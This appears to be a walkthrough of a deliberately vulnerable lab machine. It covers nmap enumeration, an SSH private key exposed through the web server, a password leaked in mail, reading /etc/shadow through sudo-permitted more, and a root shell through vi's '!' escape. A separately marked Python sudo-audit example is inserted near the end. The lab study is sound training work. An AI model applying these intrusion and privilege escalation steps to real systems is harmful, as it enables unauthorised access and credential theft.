Scenario
"The scenario for this LiveCD is that you have been given an assignment to test a company's 192.168.2.xxx network to identify any vulnerabilities or exploits. The systems within this network are not critical systems and recent backups have been created and tested, so any damage you might cause is of little concern. The organization has had multiple system administrators manage the network over the last couple of years, and they are unsure of the competency previous (or current) staff2"
Scanning
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.4
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
| ssh-hostkey:
| 2048 83:4f:8b:e9:ea:84:20:0d:3d:11:2b:f0:90:ca:79:1c (RSA1)
| 2048 6f:db:a5:12:68:cd:ad:a9:9c:cd:1e:7b:97:1a:4c:9f (DSA)
|_ 2048 ab:ab:a8:ad:a2:f2:fd:c2:6f:05:99:69:40:54:ec:10 (RSA)
|_sshv1: Server supports SSHv1
25/tcp open smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
|_http-server-header: Apache/2.0.55 (Unix) PHP/5.1.2
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Openwall popa3d
143/tcp open imap UW imapd 2004.357
|_imap-capabilities: IDLE IMAP4REV1 BINARY THREAD=REFERENCES SORT completed SCAN CAPABILITY OK MULTIAPPEND THREAD=ORDEREDSUBJECT STARTTLS MAILBOX-REFERRALS AUTH=LOGINA0001 LITERAL+ SASL-IR UNSELECT NAMESPACE LOGIN-REFERRALS
|_imap-ntlm-info: ERROR: Script execution failed (use -d to debug)
443/tcp closed https
I tried to log in as anonymous to the FTP service, but without success. I did get a 230 response, but I can't list the directory. Probably we need a user with higher privileges.
The default web page looks as below.
Nice web page. So, we can see three links, but in spite of that let's run DirBuster.
In the meantime I clicked on the CLICK HERE link and got something interesting!
Great! There is a list of usernames, I think.
DirBuster gave us this result.
OK, there are not many files. I created a list of usernames and tried brute-forcing FTP and SSH, but without success. I have no idea how to attack this machine. So, maybe we need a little bit more enumeration.
Nmap scan report for 192.168.2.100
Host is up (0.00016s latency).
MAC Address: 08:00:27:53:0C:11 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.101
Host is up (0.00016s latency).
MAC Address: 08:00:27:53:0C:11 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.1
So, 192.168.2.100 is our target and 192.168.2.1 is our attacker machine, but what is 192.168.2.101?
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.0.55 (Unix) PHP/5.1.2
|_http-title: Site doesn't have a title (text/html).
Wow, what is that?
I ran DirBuster and the /home/root directory was found! So maybe there are other users' home directories? BINGO! We found the private and public key for SSH.
Interesting... So, I downloaded the private key and used it to log in as pirrip.
I found something interesting in the /var/mail directory.
pirrip@slax:/var/mail$ ls
havisham magwitch pirrip
So, let's check what kind of information these mails contain. Our user has very juicy information.
From: Estella Havisham <havisham@slax.example.net>
Message-Id: <200801132350.m0DNoXfV010468@slax.example.net>
Date: Sun, 13 Jan 2008 23:50:33 +0000
To: pirrip@slax.example.net
Subject: welcome to the team
User-Agent: nail 11.25 7/29/05
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Thanks! Glad to be here.
From magwitch@slax.example.net Sun Jan 13 23:53:37 2008
Return-Path: <magwitch@slax.example.net>
Received: from slax.example.net (localhost [127.0.0.1])
by slax.example.net (8.13.7/8.13.7) with ESMTP id m0DNmvpV009983
for <pirrip@slax.example.net>; Sun, 13 Jan 2008 23:48:57 GMT
Received: (from magwitch@localhost)
by slax.example.net (8.13.7/8.13.7/Submit) id m0DNmvpd009982
for pirrip; Sun, 13 Jan 2008 23:48:57 GMT
From: Abel Magwitch <magwitch@slax.example.net>
Message-Id: <200801132348.m0DNmvpd009982@slax.example.net>
Date: Sun, 13 Jan 2008 23:48:57 +0000
To: pirrip@slax.example.net
Subject: havisham
User-Agent: nail 11.25 7/29/05
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
I set her up with an accountus servers. I set her password to "changeme" and will swing by tomorrow and make sure she changes her pw.
Let's try to log in as havisham using this password. Hmmm, it does not work... but wait a minute.
From: noreply@fermion.herot.net
Message-Id: <200801132354.m0DNshjD011722@slax.example.net>
Date: Sun, 13 Jan 2008 23:54:42 +0000
To: pirrip@slax.example.net
Subject: Fermion Account Login Reminder
User-Agent: nail 11.25 7/29/05
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Fermion Account Login Reminder
Listed below are your Fermion Account login credentials. Please let us know if you have any questions or problems.
Regards,
Fermion Support
E-Mail: pirrip@slax.example.net
Password: 0l1v3rTw1st
Wow, now we know our password! So let's check what we can do as root.
pirrip@slax:/var/mail$ sudo -l
User pirrip may run the following commands on this host:
(root) /usr/bin/more
(root) /usr/bin/tail
(root) /usr/bin/vi
(root) /usr/bin/cat ALL
Excellent! I used the more command on /etc/shadow.
So, we are able to use John the Ripper. Unfortunately it consumes a lot of time... We know that vi can run another command via !command.
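The defender's counterpart to that step, added here as an example that is not part of the original write-up: a small Python audit that parses `sudo -l` output such as the listing above and flags the entries that let a user read any file as root or escape to a shell. The risk table is my own short list, and treating the trailing ALL on the cat entry as the sudoers ALL keyword is an assumption.

```python
import re
# Constructed risk table (assumption, not from the write-up): sudo-permitted binaries
# that read any file as root or reach a shell (vi's '!' command, as the write-up notes).
RISKY = {
    "more": "pager: reads any file (e.g. /etc/shadow) and can escape to a shell",
    "tail": "reads any file as the target user",
    "cat": "reads any file as the target user",
    "vi": "editor: runs arbitrary commands via its '!' command",
}
RUNAS = re.compile(r"^\s*\(([^)]*)\)\s*(.*)$")  # "(root) cmd, cmd ..." lines
TAG = re.compile(r"^(NOPASSWD|PASSWD|SETENV|NOSETENV|NOEXEC|EXEC):\s*")

def parse_sudo_l(text):
    """Turn the command lines of `sudo -l` output into one dict per command."""
    entries = []
    for line in text.splitlines():
        m = RUNAS.match(line)
        if not m:
            continue  # prompt, header and blank lines carry no rule
        runas, tags = m.group(1), []
        for spec in m.group(2).split(","):  # "(root) /a, /b" lists two commands
            spec = spec.strip()
            while (t := TAG.match(spec)):  # tags such as NOPASSWD: precede a command
                tags, spec = tags + [t.group(1)], spec[t.end():]
            cmd, _, args = spec.partition(" ")
            if cmd:
                entries.append({"runas": runas, "tags": tags, "cmd": cmd, "args": args.strip()})
    return entries

def audit(text):
    """Return (cmd, reason) findings for every risky entry in a sudo -l listing."""
    findings = []
    for e in parse_sudo_l(text):
        # Bare ALL means "any command"; the trailing ALL on the write-up's cat entry is treated the same (assumption).
        if e["cmd"] == "ALL" or "ALL" in e["args"].split():
            findings.append((e["cmd"], f"ALL keyword: any command as {e['runas']}"))
        name = e["cmd"].rsplit("/", 1)[-1]
        if name in RISKY:
            nopw = " (NOPASSWD)" if "NOPASSWD" in e["tags"] else ""
            findings.append((e["cmd"], RISKY[name] + nopw))
    return findings

# Constructed sample: the listing from the write-up above.
SAMPLE = """\
User pirrip may run the following commands on this host:
    (root) /usr/bin/more
    (root) /usr/bin/tail
    (root) /usr/bin/vi
    (root) /usr/bin/cat ALL
"""
```

Running `audit(SAMPLE)` reports every entry in the listing, which is the point: a sudoers rule that hands out pagers and editors as root is equivalent to handing out root.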
Game over!